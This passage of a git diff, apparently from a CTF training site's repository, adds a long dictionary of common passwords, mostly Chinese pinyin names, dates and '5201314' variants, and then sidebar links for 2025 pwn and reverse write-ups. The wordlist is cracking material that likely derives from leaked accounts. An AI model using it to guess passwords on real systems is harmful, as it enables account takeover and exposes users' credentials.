+asd321asd +900113 +hyh123456 +7758258zz +19811028 +qiji850224 +xiaocui123 +aaa456123 +147963 +890301 +chenzhi123 +love1223 +1989516 +qwe789asd +491001 +qwerty1 +w654321 +820604 +123456nba +chenqiang +123456789zx +123321zz +wang2012 +woaini222 +xiaomi520 +maybe520 +831018 +yangfan1 +liufei +19831003 +a147896325 +aa102030 +000000as +qq123457 +chunchun +122500 +qq0000000 +7758521123 +198151 +19841112 +821027 +880911 +19850816 +801129 +147369a +xiaoming520 +860524 +860523 +baby123 +nihaoma88 +qq134679 +198471 +198477 +861109 +19820213 +19850610 +19850611 +19850619 +yu1314 +yangkun +qian1990 +hello110 +qy7ttb838q +chaochao123 +cheng1990 +pb123456 +guigui520 +cq5201314 +159753ss +870913 +19870323 +19870327 +tianjin123 +zhuang521 +mayang123 +apotoxin4869 +372100 +880330 +xiaoxiang +wangsong +19831225 +asdf520 +860124 +a83553632 +ling1992 +880413 +880412 +870712 +870719 +zhaohui +chenchen1314 +xiaohu521 +890215 +xiaoyu1987 +1987926 +1987921 +gaomin123 +19871103 +feifei000 +lele1314 +19830624 +321321qq +3814279zz +zhoufeng +wang112358 +yangxin +800915 +890415 +guodong123 +19890913 +19890421 +850914 +1987627 +winter +shenhua521 +microsoft +1987523 +aaa120120 +asdf2008 +830919 +520wenwen +900522 +900521 +wo4tiancai +7758258aaa +shao1988 +wyj123456 +52115211 +dajiahao1 +831217 +zhang1210 +qazwsx110 +woshi111 +22222222a +1984116 +7758521zy +woaiwei1314 +19901024 +19840208 +19840201 +132546 +q12we34r +584520qq +lizhi520 +luoyu520 +zhangrui521 +woaini135 +zgz123456 +19840309 +890311 +yangyang88 +198332 +123456yt +123456yx +wwww2222 +891209 +chenjian123 +monkey520 +811208 +811202 +811203 +zxw123 +831029 +198656 +binbin1314 +yuanzi520 +nokia6670 +19880420 +19880421 +19891008 +1987818 +jiajia321 +a142536 +huang1994 +yang1224 +820915 +wjl123456 +aaa2523260 +you5201314 +19891107 +19891109 +wangxiao123 +jiaren520 +620620 +13145210 +870921 +811107 +811109 +19891206 +19841122 +19821203 +19850901 +891020 +521iloveyou +human123 +880904 +880902 +he123456789 +1314521aa +jingjing21 +chen1230 +lyj123456 +jordan2323 +1990528 +cctv123 +821219 +xiaoyi521 +woaini0123 +19880205 +zhanghui520 +zyj12345 +861002 +880915 +p2ssw0rd +0147852 +yanghui520 +123456798 +xxx111 +dong1120 +li12345678 +5211314ly +231147 +mm112233 +jay89757 +xiaolei521 +dragon1988 +iloveyou77 +a19881212 +870721 +yanfang520 +811127 +123000aaa +19860418 +jj201314 +19821011 +19880413 +19901129 +891201 +tiankong +870427 +kissme01 +wusuowei +871020 +200110 +1987618 +aa123000 +742141189 +820814 +wz06132817 +521130 +pan123321 +yellow +hanbing520 +gq123456 +zhang147 +mj5201314 +a19901103 +zhuang5566 +520520abc +q987654321 +xiaogui123 +wjh5201314 +19880403 +19840407 +52hj1314 +880527 +huanghuang +a19901008 +123.321 +19840410 +shadow +guo100200 +340123 +5201314cs +wanghe123 +198844 +198845 +xinwei871108 +chentao520 +robin123 +qq110119 +chunchun520 +admin1234 +791208 +aidejiushini +820323 +qing1234 +jj123456789 +5201314jun +198325 +12315123 +acmilan7 +55455055a +a123465 +1983121 +198022 +198021 +19911223 +youxi123 +a7788520 +12345678m +351100 +wang1030 +19850218 +811213 +xiaoyuan +19880718 +19880714 +198663 +nishisb1 +1984520 +wxh5201314 +5201314ty +jiubugaosuni +1986916 +wangfang123 +wo131421 +zhuchao123 +52yuanyuan +830127 +happy999 +000666 +19850626a +871114 +19831128 +19831125 +820906 +820903 +nana5211314 +1988915 +19880513 +shan1234 +159753as +wangfei521 +mengxiang +123456fly +shishi520 +aa168168 +123456789ss +840326 +891031 +a19880326 +19821110 +aa147852 +19840124 +830627 +wzx123 +801202 +901007 +198931 +sun192114 +shen1984 +chengcheng +ting1992 +teamo1314 +19870605 +zhiaini +801102 +lj000000 +guan1987 +19850710 +19850714 +821208 +030303 +19870109 +deydsfi123 +19871130a +woshishui3 +88488848 +19910803 +19850515 +aihuan1314 +as456123 +19870304 +aaa7758521 +19900217 +168999 +19890818 +19890810 +sd6504252 +19840820 +19840822 +woaiyy1314 +lovejie1314 +19870209 +meinv521 +322322 +yanyan123456 +xiaoqing520 +liu159357 +qq123456a +yigeren +850428 +woailaopo8 +linqiang +2582525775 +gudu1314 +cjw123456 +1986128 +xixi123456 +liuqi5467 +891214 +800814 +800816 +chao1314 +gundam0093 +lin584521 +yangzi +zhong1986 +moshou520 +19910928 +mj5211314 +bulibuqi +890718 +810826 +shen1992 +19910321 +hhh123456 +yao35165 +t00d00 +gaoyuan521 +gaoyuan520 +a52013145 +cc112233 +wangyong123 +19840628 +55667788 +ocean521 +ww521521 +wojia123 +19820521 +880410 +781020 +781026 +317317 +lyz123456 +laoma520 +aa456123 +lian123 +19901204 +19901209 +hsz123456 +likun123 +tvxq12345 +xiaoxiao1989 +love10000 +li110110 +zhb123456 +wsk123456 +xiaochun +a4742488 +198857 +198856 +198853 +801016 +060606 +lh5201314 +45683968 +130682 +521600 +820317 +sunhao521 +1988320 +198316 +micky6002 +1990222 +wo9shiwo +abc951753 +19850303 +qwe110120 +19880602 +33455432 +qscesz123 +yang1008 +5211314love +china163 +dear5201314 +killyou +1989212 +198678 +wyf5201314 +mickey +xiaoli +841229 +841224 +860422 +860427 +abc121314 +weichen222 +jiandan1 +liuxing521 +841129 +wang11 +19880503 +880728 +q3344520 +558899 +daohao48 +forever7 +xx123321 +870909 +870901 +1986814 +821113 +821116 +zf111111 +811126 +AINI1314 +1233211234567 +cg5201314 +qqqqqqq1 +china2000 +891006 +zh000000 +wql123456 +yu7758258 +19900608 +830618 +qaz7758521 +wenjun123 +yangxi123 +810822 +lx1314520 +910823 +980520 +19821029 +19821023 +cba123456 +801118 +fdsa4321 +wangxu520 +19850727 +class123 +19870115 +19870110 +cs7758521 +z159753 +lulu123456 +star1982 +19901211 +woaini0000 +19900308 +jiangyan +1985102 +xxxxxx +a1989121 +19870417 +1987211 +19870313 +jiangdong +815000 +870512 +wang1220 +19890807 +lixiang1 +hutao123 +xuyuan123 +1314xingfu +mmm123456 +l00000000 +wj100200 +mayday5 +liudi123 +liyao520 +890228 +890227 +890225 +tb123456 +100123 +1987916 +1987913 +xiaolong00 +1qaz!QAZ +123123ok +123456nm +891223 +daisy520 +890527 +850614 +789456123qq +tang12345 +jiang1213 +820624 +aa123123123 +linger520 +woaini250 +wc123456789 +jason119 +761126 +820727 +525799 +g00dluck +q19851113 +1986duan +19860904 +xiaoyi2008 +820428 +820426 +zhangjin123 +123451 +5211314y +yanyu123 +maolin521 +890628 +890622 +198421 +liangyu +cm19771224 +198567 +rr5211314 +yong123456 +lj123456789 +yanglin888 +19820519 +huangwei12 +yanghua123 +a12312300 +135136 +woshiren123 +19901213 +xiaoniao +yang2005 +a1303235 +aihong1314 +yu000000 +mm123321 +zhan123456 +qiujie123 +yuchen123 +801002 +820205 +liulei521 +1979118jay +123iloveyou +ff5211314 +19901016 +8811611zgz +mimashi123456 +900918 +123asdfghjkl +xuxu123 +800819 +wojiushiwo1987 +1987629 +deng1988 +52089913 +zhanghan123 +py123456 +19920207 +ll198712 +hujing520 +wxy123 +zhangzheng +12312300 +zeng1234 +zjw123 +820218 +19850118 +1QAZ2wsx +910119 +1986528 +ls123456789 +323323 +liang1980 +liang1982 +zsw123456 +19890225 +love100200 +830104 +198708 +1990919 +jx5201314 +820920 +xiaobin +loveyou13 +liujie521 +shirley +19890128 +198791 +w3344521 +wangye520 +love1229 +wozhiaini1 +aiziji99 +zxcbnm123 +zhang1996 +juan5211314 +1314520zhu +tong123456 +jiangbo123 +love1126 +ws000000 +xiong1990 +huang1982 +kaikai +luojia123 +198282 +198498 +an1314521 +liuji123 +jiangyi123 +huihui1314 +tina1120 +caonima88 +wangke123 +19860623 +qaz123QAZ +881104 +p0o9i8 +xiaorui123 +qian1991 +410520 +basketball +happy110 +qq1992 +yanbin521 +881002 +guang1987 +guang1984 +ASDF123 +198181 +zhang1020 +noah21cn +capslock +s7777777 +lovezj1314 +xiaoyao11 +xiaohei123 +1234567yy +19860128 +198689 +198683 +formula1 +qqqwww +850507 +jiajia5201314 +199188 +zx7758258 +123456lr +liqiang007 +mao12345 +xiawei520 +19820923 +810512 +dan123 +mengxiang1 +xiangyang123 +love2002 +zq159357 +zhoulei +dsaewq321 +222222a +123456jie +password00 +woai5566 +yz5201314 +010203aa +keke5201314 +123456mo +liu159753 +891231 +1987825 +wangyi163 +000521 +guanguan +comeon11 +19820606 +900523 +1987721 +159753qwe +820711 +yy7777777 +412412 +aaaaaaaa1 +weiwei1986 +zhangxiao1 +deng1992 +781203 +820518 +hero19860126 +lixin123456 +harrypotter +198517 +aa520123 +19880911 +xuhui520 +wangbin520 +darling521 +781004 +123456789xx +023023 +fendou +zhouyu520 +5201314wang +840623 +5211314wang +781105 +qq77585210 +19870427 +012315 +chenbin123 +198839 +1010kidd +19870722 +melody520 +three333 +ballack13 +198218 +1314521521 +asdfgh12 +qweqwe1 +wangchao1 +zhaolei520 +860808 +zhanshen1 +wanwan123 +1989114 +1989117 +1989113 +860908 +lx7758521 +860606 +19880629 +19880620 +19880626 +134679258 +830313 +yang1023 +0000OOOO +h123123 +chensi123 +woaiwojia99 +891117 +a7758258a +123456lei +azbyc123 +ywj123456 +lipeng520 +841203 +menghuan1 +knight123 +1986510 +asd110220 +wangbin88 +841101 +841105 +loveyou00 +91d428aa +1988922 +19880529 +wangduo198128 +xiaoyi1982 +love1210 +1985521 +870826 +19900626 +apple12345 +198945 +xiong1987 +xiong1983 +19830928 +phoenix1 +magic123 +wanghong +a7758991 +jiangyu123 +900128 +900123 +900127 +19910318 +nuonuo520 +19860514 +850219 +850216 +cheng5201314 +19870131 +123456ad +198484 +hacker007 +yangzhi123 +wang9696 +xiaojia123 +yangle888 +zm1234 +881111 +sunbin +xiaoxiong123 +xiao12345 +840929 +19900228 +zhangzhang +19890824 +900627 +www666 +125900 +890816 +zhang1010 +aszx123 +feifei88 +19860118 +850510 +gong123456 +871231 +810525 +831122 +594201314 +A5201314 +chen159753 +831221 +54genius +100101 +820101 +qiao1988 +qwerqwer +123456ls +123456ld +lijian1314 +521258 +19811022 +19811029 +030201 +imissyou123 +19910813 +820603 +820601 +520xiaoyan +as521314 +890317 +xiangxin +19880523 +liu1234567 +caonima456 +qazxsw21 +wangguan +123zzz123 +zxz123456 +f1f2f3f4 +wanghua520 +iloveyou3 +198400 +198409 +987654321z +duibuqi123 +jiushiwo1 +meimei +19880809 +aiye1314 +19820412 +880122 +198505 +1984115 +ch5201314 +860311 +aa456789 +861103 +880225 +lishuang +zxcv1230 +19830214 +1989chen +1986121 +1986124 +12345699a +851004 +aaa7758258 +tangtang123 +a1986925 +le123456 +860111 +wodehao123 +112800 +801028 +801021 +m4a1ak47 +820225 +peter1989 +woaixin1314 +584woaini +861208 +1983321 +acmilan +198835 +feng1024 +jiandanai1314 +870626 +52101314 +860818 +xiaowei1990 +tiantang00 +yang123123 +198362 +198367 +319319 +19830612 +19920326 +1qasw2 +0451392 +xiaozhu1314 +830520 +hubing123 +860617 +19890926 +19840828 +jiayou520 +721123 +19860222 +daohaosb1 +a135246 +1989224 +1989225 +850828 +850822 +850826 +19900806 +19900802 +wsl123456 +zhuzhu5201314 +yangfan521 +1989521 +ljq5201314 +52wodejia +841115 +zjb123456 +zhang987 +19830110 +666789 +200300 +h5211314 +12345jkl +smiling123 +as520530 +loveying1314 +220220 +lovexin1314 +a110112 +hua520 +hanming520 +830727 +123456789ww +liyun520 +520wangjing +iloveyou1990 +liuyun123 +dddd0036 +921228 +900222 +z123x123 +wyh123456 +900214 +jackson1 +w19871013 +19860405 +850305 +Q1w2e3r4 +19890603 +xiao521 +taishan1 +*963.*963. +52zq1314 +584334421 +jiang315 +pengtao520 +zhou1314520 +zhangqian1 +aassddff1 +woaixiao1 +890329 +cyq5201314 +z88888888 +ly123321 +chenjun007 +yanglu123 +qq147369 +199084 +syh456789 +chen456852 +wangle123 +liudan520 +900610 +yue123 +19910114 +4742488 +qq11111111 +qwe111222 +qwert147 +milan521 +chenjing520 +5201314pp +beckham237 +wangyue520 +1q112233 +555222 +123321w +chen1012 +831112 +831114 +wangxing520 +q1234567890 +840128 +6yhnmju7 +a521125 +626389 +19901015 +900821 +840228 +chen1026 +5201314jing +zhou123321 +gao12345 +13709394 +102588 +19911119 +19910824 +qq11ww22 +1986xiao +800217 +Z123456 +19820501 +zhangyi1989 +love5200 +zxcv1994 +hejing +libo1314 +wangshu123 +yuanhao123 +zz0000 +dan1314520 +125888 +19880819 +860208 +925925 +liuwei1986 +1986712 +880115 +198535 +198536 +as654321 +wo1314521 +zhang139 +zhang133 +811008 +100086 +615615 +861111 +z19850125 +lj5211314 +xiao1017 +19870508 +900911 +1989912 +hehe123456 +zx159357 +a19881120 +159753456 +19831202 +1234567m +19870401 +19870402 +1314520yj +780926 +19870705 +5211314liu +880516 +198238 +19830701 +1212121z +asd521521 +htbenet100 +wode1986 +771010 +123456ck +830909 +nokia8210 +caoni123 +860927 +hc5201314 +19840102 +860916 +851119 +665210 +prince521 +860621 +woshinide +1988129 +3iverson +12345xyz +19890930 +yujun520 +199162 +huang555 +xiongwei +yang0219 +yujun123 +19860719 +hanli123 +gaoming123 +342601 +yt5201314 +jian1030 +asd520123 +870213 +369000 +window123 +19870928 +1234ab +a19901230 +838383 +19830122 +1986613 +100001 +888555 +720520 +a19861107 +zero0000 +qwe753951 +liugang123 +900316 +liwei2008 +wangyan1 +19890719 +19890718 +19890716 +19890710 +199911 +19870507 +12342234 +198892 +0012300 +qq010203 +131417 +hotmail +880088 +775200 +zjj123456 +19860616 +8023forever +518000 +zheng001 +wo8023ni +happy121 +1991119 +zhang1112 +19921006 +1234567ll +52baobei +long1983 +woaini234 +yang1995 +19921107 +wudan520 +741741741 +831006 +831004 +Aa1234 +chenwei888 +kkk123456 +chenxiang520 +zhang12 +19831031 +woaiyuan1 +831109 +831107 +198753 +840113 +ss7223253 +811028 +831204 +831202 +831208 +weiiew123 +zhoubin520 +aiwo8zou +1986228 +123456jn +751123 +qwertyuiop789 +lj841120 +huangjian0 +donghai521 +19821228 +ting123 +840311 +820626 +12345z +19821120 +19821129 +880924 +880927 +801231 +19911029 +meng5201314 +a112233a +chenqi +xiang1992 +qaz741963 +liu100200 +zhangchao1 +5201314iou +1985zhang +jiushini +520125 +198462 +aa010203 +nana1990 +820521 +haizi521 +910118 +19880327 +19880326 +19820910 +aiqing123 +xiaoqi77 +zhang125 +zhang120 +zhao1225 +19880929 +19880928 +shenqi520 +19900501 +19900509 +zhaoming123 +19801980 +luobin123 +love0527 +19900401 +19890223 +liuqian520 +1989921 +a19881117 +zhujun123 +rabbit +880402 +19890509 +19890505 +871228 +xyw8u5jk +wangting123 +sun520 +851205 +19890402 +feifei86 +19821202 +daidai +a19860604 +198341 +jiawei520 +1988110a +lantian123 +ml5201314 +1988abc +qaz000000 +520mm1314 +jj159753 +890720 +zhangxuan +19860208 +hailong +19900926 +19910312 +19890124 +19890321 +333444 +5201314zh +woaiwojia888 +123456zf +zhang5210 +721202 +st5201314 +19881206 +a2222222 +mimashi521 +sh5201314 +fish1234 +lxh123 +a19861014 +zzf123456 +123456cb +871216 +cyl123456 +zhaojing520 +600600 +25897758a +zhangmin521 +xulei1990 +m1314521 +900312 +zhenzhen521 +wangxing123 +19890722 +19890729 +fx123456 +890108 +198864 +love1025 +54liuwei +haoxiangni +zhang2010 +791229 +ooo000ooo +a123581321 +yinyin520 +890306 +123456zd +aa456456 +12356789 +xixi1314 +niaiwoma88 +890927 +suifeng123 +zhang1123 +zhang1127 +yu7758521 +19921017 +yujia520 +andy100200 +yuxin123 +beyond1987 +abc147852 +hao5211314 +19880802 +terry123 +zhaojie123 +zhao1994 +ai1314521 +woaijun1314 +qq3344520 +19831001 +vivi5201314 +vision222 +19921214 +licheng +zxh123 +123126 +yr123456 +920126 +840101 +19831104 +19831102 +young123 +liuyang007 +hyh5201314 +880712 +831215 +tt123123 +123123tt +5211314abc +19821212 +chaochao520 +7758258yy +1986927 +880913 +198913 +19850814 +xiaomeng1 +811811 +xiang1982 +19821012 +801121 +801127 +az5201314 +901127 +901121 +xiaobo521 +zz1314 +665544 +lin000000 +860220 +19901115 +19880314 +yatou1314 +52105210a +840422 +mango123 +qq521125 +xiaohan +zhanghui00 +890422 +mei5211314 +qwaszx11 +242526 +521dandan +jie1314520 +jackson123 +mk123456 +19831224 +zhufeng123 +1986214 +1986219 +www51com +loveyou2 +753951a +880411 +880419 +19890510 +19890512 +013579 +d1234567 +likai520 +avril520 +519519 +wangjiang +asd12321 +198258 +198254 +890218 +zjx123456 +1230000 +lijiang123 +xiaomao520 +lifang520 +0000000qq +851019 +qq2011 +zhangyan1 +890416 +19910208 +zhangheng +she5201314 +wulei123 +870313 +16364361a +19860217 +sunny1990 +1122334455 +chunchun123 +890617 +ah123456 +yuwen123 +1987528 +woyao888 +123456dong +12345670a +jay12345 +wjq123456 +19880807 +520lihui +wuwangwo1314 +kobe24mvp +900524 +900520 +lhf123456 +900329 +19840409 +zhangzhen +beckham520 +sunrui520 +888777 +198986 +aa1230123 +xu111111 +890118 +asd159 +5211314qqq +840921 +840920 +asd852456 +800328 +800324 +791213 +520210 +135920 +th123456 +800425 +houwei123 +ls7758521 +zhi2ziji +0O0O0O0O0O +pingping521 +music123 +qiang219 +19921025 +asdfasdf123 +1314520as +333555 +kong1989 +wang1026 +1235813 +741010 +mao5201314 +811207 +5201314sx +zhang3li4 +12597758 +19831015 +wangyue521 +maming123 +jinke1984 +1472583690 +147258369z +likun520 +880608 +chuan123 +lll123 +l7758258 +811004 +199142 +zxl5201314 +840216 +840211 +811105 +haifeng520 +zheng1983 +killua77 +king2008 +sunhao123 +19821106 +19821104 +woaishui1314 +198908 +yinjian123 +19850805 +yy521521 +19821009 +901114 +790620mfch +19850709 +c1h2e3n4 +yingzi123 +19880204 +19880207 +19811128 +chen2009 +luoyong110 +19900321 +cheng1985 +wang5566 +5121314a +zhao5352 +kiss2008 +wangli1314 +baobao84 +woshi789 +1234321qwe +910618 +19900528 +wangfan +chao1989 +wang1001 +a251314 +cptbtptp123 +r5201314 +810326 +lxj123456 +19870531 +micky0604 +0000000z +wuyuan123 +kuaile2008 +ASDFGHJKL +qq1010110 +870323 +ping123456 +xiongmao +chenwen520 +811129 +1314921a +19890429 +a19910801 +duandian +yu201314 +123456shi +wuyong123 +731731 +201314a +19811227 +19840118 +qiqi5211314 +1987811 +198802 +daohao110 +xiaogui520 +shi1314520 +19811129 +535353 +575859 +jinxin1983 +830424 +zx521314 +790624 +19811228 +chenlei1989 +159875321 +asdfghjkl0 +1987613 +19860924 +xuanyuan +1985wang +890601 +890603 +890606 +521131 +19860325 +wangxing +qq259758 +0000001 +xiaoming521 +198543 +yuefeng123 +shuchang +wangzhi123 +qwe147 +zhao521 +sun123123 +198789 +jay118 +qaz147wsx +xiaoji123 +zhaoyang1 +laopo1314521 +liuchang521 +zhao1980 +alwkfcu3 +dx1314520 +a110119120 +900415 +333666999 +770318 +sui123456 +xiaoyu1234 +5201314cl +1314520fei +gh5201314 +xuhuan123 +qiuqiu +1989922a +gy5201314 +jing1987 +01230123 +19840217 +wq5211314 +12141214 +yuanwei +wj1314520 +guojie520 +qqqqqqqq1 +820324 +820326 +hukai123 +19850612 +456852a +zhang123123 +1988331 +963369 +xiaoniao1 +791102 +jx123123 +19850419 +baobao11 +123321zhu +19840327 +angle123 +19880119 +112212 +dong1314 +ww12345 +kiss520520 +123321abccba +19911226 +woaini1121 +abc456789 +19920229 +juanjuan123 +qw520520 +woaiff1314 +1989321 +1982919 +mike123 +xx123456789 +19850215 +d123123 +a3366614 +caiwei123 +hzl123456 +123456yuan +xiaojing2 +19880717 +wanggang123 +831030 +830221 +830228 +198669 +199074 +199073 +1984528 +52you1314 +waxm1314 +789000 +bing1988 +ll520520 +xiaojie12 +871118 +871119 +yang1231 +780214 +1988918 +niu123 +qwe778899 +1989422 +qq251314 +jiang1995 +13145920 +hy123456789 +wangqiang520 +880812 +carter +840324 +zh666666 +821112 +870810 +z1z2z3z4 +19920802 +qq8023 +7418529630 +19821112 +830622 +jinxin123 +901003 +198938 +52291314 +1qq11qq1 +810830 +shen1988 +beyond521 +19900519 +epwq1314 +801105 +901106 +901104 +a8520123 +love7251 +wang666 +a1987721 +870115 +870114 +870110 +821204 +c9874123 +liuke123 +19880210 +kjj19860126 +guojing520 +womenzai1qi +198458 +901207 +ys111111 +woshinidaye +zhang1111 +aptx4689 +qwert521 +woaini318 +www111111 +hu000000 +555123 +123dragon +19850511 +summer521 +52059487 +xiaohai521 +911030 +win123456 +19870305 +19870303 +19900216 +123456ren +lishuai110 +19840826 +luliang123 +z123456y +hang123 +1987127 +qwe110110 +paopao520 +0123456q +a519351a +gn123456 +hanxue521 +zzl060606 +woainilaopo +linxiao520 +wufeng520 +a7654321 +hanhai123 +850729 +850720 +15c66d8b2 +as123000 +xiaolong12 +198399 +198392 +1231234 +520zheng +honghong +123456ou +123456o0 +bugaosuni123 +890512 +shanghai2010 +kk123123 +qw112233 +100200kk +yanshi123 +weipeng123 +xx211314 +wh1314520 +wangmin521 +saber123 +xiaoqin520 +fuqiang +ads123 +aimama1314 +19921109 +chobits123 +19910926 +19910924 +fanfan521 +wmt9d30sj +chen0123 +a2902287 +199127 +900514 +870226 +love3399 +19831222 +qweQWE123 +long0000 +19910325 +19910326 +zx1230 +liyuan521 +871226 +19910621 +19840624 +258521 +198577 +zxczxc00 +800119 +wp1314520 +19801022 +19820523 +ting1234 +00oooo00 +qwe123qaz +19811214 +781024 +hu123456789 +981225 +a12312312 +5201314sky +zq1135313 +1155665 +helei520 +19901206 +alexander +woaiwoma123 +zhangtong +1234weibizhi +19840522 +19840525 +19841220 +jinhao520 +198855 +100544 +pass1word +playboy1 +wangfang +ying1234 +sunyan +19901030 +66668888 +lxx123456 +123w123w +bao5211314 +a53231323 +long5210 +hyde19690129 +yuyang1987 +tangke123 +320320 +320323 +WOAINI123 +mayuan123 +wen520520 +19850409 +19850402 +school123 +qepwq521 +love0625 +wangjin520 +19911218 +1990127 +y12345 +19850305 +521jiaren +703851428a +198115 +111qqqaaa +860727 +860722 +xuhui123 +522522 +beckham1 +830214 +love0808 +199063 +baobao321 +wang1105 +tl5201314 +841223 +zq111111 +yang1103 +kof2000 +820811 +ssdlh12345 +197911 +zx12345 +woshitian1 +871107 +allen004 +19870826 +813813 +zxcvbnm8 +xy1234 +870903 +821111 +fq123456 +123456vv +880805wsj +870807 +891009 +shuaiqi123 +chen0926 +345345 +198925 +baobei77 +19850829 +19850823 +891101 +19830904 +qwerty11 +19890630 +aini521521 +801110 +yy111111 +zz147852 +521china +sd123123 +lyh123 +wait1314 +001007 +xuyan520 +libing +77585211314 +zxc111222 +xg5201314 +mm1314521 +a147147 +a110119 +w12369874 +andy1234 +12a34b56c +wenjing521 +654321qwe +yh123123 +900810 +890220 +tang1987 +a123456123 +781006 +zhouzhou +0358530 +520baichi +800829 +woainima00 +890524 +dada520 +024680 +19911121 +19911122 +rainbow123 +yao7758521 +haojie123 +mark1214 +woshiwo12 +wangqian +a1478963 +5211314s +xx100200 +19820311 +ting521 +890626 +jasmine123 +laogong5201314 +mima6462 +52beckham +123456wb +123456wt +china888 +wuhao521 +Password123 +chy123456 +900519 +asd110119 +lipeng +qw100200 +1314520wu +xx123654 +852258 +wyw123456 +yishengyouni +mima110 +chentao1989 +woaini777 +520911 +zzz000000 +900919 +123001 +mima654321 +123456fq +chuanqi3 +qq258258 +long123123 +791027 +900208 +19860304a +lwf123456 +521shuang +801030 +wb111111 +21wqsaxz +5201314tm +a1491625 +a19861023 +yang1013 +111111s +dada1234 +woaimama520 +wangwen123 +841218 +fujun123 +19850112 +guo7758521 +jingjing1989 +1988813 +830101 +zhendeai1 +slamdunk1 +19890121 +1230123q +liudehua +xuyang521 +841019 +198794 +870910 +123a123s +19860506 +880531 +love1221 +doudou1314 +a1989810 +535897 +19900630 +wangyao +zhouxin +chen7758258 +wang007 +s5626453 +cc111111 +xy123123 +liuyue521 +joe5201314 +19890620 +778899qq +233233 +fuck2008 +huangyu +ma112233 +yyy123 +huangwei520 +12wqasxz +woaiwo +jie521 +qian520 +ning1314 +gj100200 +a1564335 +125300 +as147852 +jinqi123 +110120119a +wang1231 +a19880216 +chen1231 +890826 +19870224 +flower +gongyi123 +qwer4567 +xiaoxiao312 +911217 +woaixue1314 +jimo1314 +lym5201314 +iloveyou21 +shijie +19820929 +an5201314 +yanzi5201314 +1234qweasd +z521521 +xiner521 +850606 +19910806 +cxl5201314 +taowei90429 +cx1314520 +kc123456 +850104 +jiangsu123 +lulu5201314 +kathy520 +q1212121 +wohenni +678910 +zhoulin123 +wenjie +zd5201314 +zhiyuan123 +Password +tianshi11 +lw584521 +zzz12345 +woaini1220 +fang1986 +880131 +1984zhao +zhang112233 +zhang113 +wohaishiwo +yyan1314 +qwe1asd2 +queen123 +808808 +zs5201314 +cq123456789 +110112113 +1234567qw +zm1314520 +yang5200 +lzy123 +31415926z +145dewei1 +123456abcabc +622622 +dd1314520 +wang2000 +123liu456 +sheng168 +zhao7758 +5201314dan +guang521 +asd123789 +19821119 +ai19880101 +abcd654321 +feifei1984 +qwe456yui +wzh12345 +aaa1314521 +hufeng123 +112244 +0725feng +zxq123456 +543210 +jiangli +1989318 +xxyy123456 +525700 +jq123456 +88woaini +dg8fvb9tky +asdASD123 +zhai123 +liujian1 +5201314wj +xingfu3344 +woshi456 +chenxin521 +jinwei520 +780221 +890113 +wangwei110 +520588 +520584 +wei12345 +zc1314521 +chen1980 +19890508 +cp5201314 +aaa1230 +xue123 +tangjie520 +hejing520 +nevergiveup +guojin123 +wujiang123 +820425 +cy654321 +wr123123 +zz201314 +615243 +hujun520 +900124 +fengjie123 +jinwei123 +850210 +921019 +zx100200 +a12121212 +aishangni +820427 +love100 +lm5201314 +lang1988 +52611314 +xiaoqian521 +112211zzz +weijian123 +love9999 +mutou123 +jjjjjj +li159753 +bushi3344 +54bendan +1478963a +asdasd001 +dong1992 +dong1990 +123456lg +224488 +anjing123 +hxw850525 +zc1234 +guan1025 +wxs123456 +zhh123456 +qaz74123 +love5210 +fang2008 +328328 +5201314f +Abc123456 +zxx123 +wang000000 +wangli789 +800104 +zp5201314 +li771111 +820405 +eugene520 +zxm123 +admin007 +zcw123456 +sd000000 +wobuzhidao1 +smile521 +czy123456 +861101 +scl123456 +lll5201314 +lovemyself1314 +chuanqi1 +zhaowei1 +woaijing1314 +wenjie123 +bangde007 +781130 +windy123 +zhangji123 +860112 +19900726 +wjy123 +maomao55 +2233456x +0123abcd +nana123456 +jianhua1 +870625 +860813 +ok123123 +080512 +liyun1983 +123456ds +123456du +wang1218 +jianjian520 +lihai1989 +830521 +woainibu00 +keke520 +windowsxp1 +zcy5201314 +511521 +huangwei123 +zhangye123 +wh123123 +851105 +zhenai520 +leehom520 +www123www +5201314xy +xiaohe521 +870221 +123kuaile +angel0000 +!QAZ2wsx +yueliang +131452100 +zhaodong +a7410852 +830927 +830924 +123baobao +xiaoyao521 +love521314 +lxh5201314 +123aa456 +haoren +zhangyan521 +156156 +555555a +bobo1989 +z110110 +daohaode4 +52dandan +lishuang520 +zx1234560 +ss000000 +qwe123520 +guowei521 +woaiwenwen1314 +1212121 +890806 +h19841230 +zhang1005 +command123 +aa11aa11 +635613yw +820201 +zj112233 +831113 +831118 +alick3110 +qiao123456 +q123456789q +wang1996 +lishuang123 +asd123qwe +1989825 +jiang1983 +591888 +19860303 +daohao4qj +850624 +778899abc +abcd1984 +lotus123 +qq7758521qq +blue1987 +q52013140 +badboy +521apple +880930 +ran123456 +850125 +a865e0d9 +19911030 +heise123 +0594184 +820410 +zzx5201314 +op123456 +lss123456 +future123 +zhujing520 +xigua123 +cherish +iloveyou2008 +820309 +781223 +wang211314 +ff1314520 +bigbang520 +2011jiayou +7758521love +880111 +880118 +gougou520 +gaokao2010 +dongwei123 +811006 +cp1989713 +880909 +wangjia520 +asd110120 +lj123321 +a159753a +lihong520 +52zx1314 +lyx123456 +19870502 +miao12345 +asdf8899 +525100 +wz7758521 +Beijing123 +xia1314520 +860106 +wangshuang521 +l5211314 +zhangjie1987 +a19860321 +limeng521 +woaini741 +fuckyou8 +880513 +xuwen123 +qwe110 +zhang130 +ming1992 +music001 +123456cp +hanxing123 +860928 +loveaki6 +lj666666 +xiaoya520 +fire1234 +711711 +qwe789iop +123456hx +dp123456 +830415 +111zzz +861110 +e2345678 +lichuan123 +qq520521 +1234as +a201314 +sjj123456 +791021 +woaini1221 +790911 +weishenme123 +O0O0O0 diff --git a/theme-config.yml b/theme-config.yml index dab0778..f7e23a2 100644 --- a/theme-config.yml +++ b/theme-config.yml @@ -433,3 +433,399 @@ sidebar: link: /wp/2024/week5/misc/pyjail - text: I wanna be a Rust Master link: /wp/2024/week5/misc/rust-master + + "/wp/2025/": + - text: 前言 + link: /wp/2025/ + - text: Week 1 + items: + - text: Pwn + collapsed: true + items: + - text: Pwn's Door + link: /wp/2025/week1/pwn/pwn-door + - text: GNU Debugger + link: /wp/2025/week1/pwn/gnu-debugger + - text: INTbug + link: /wp/2025/week1/pwn/intbug + - text: overflow + link: /wp/2025/week1/pwn/overflow + - text: input_function + link: /wp/2025/week1/pwn/input-function + - text: Reverse + collapsed: true + items: + - text: X0r + link: /wp/2025/week1/reverse/x0r + - text: EzMyDroid + link: /wp/2025/week1/reverse/ezmydroid + - text: Puzzle + link: /wp/2025/week1/reverse/puzzle + - text: plzdebugme + link: 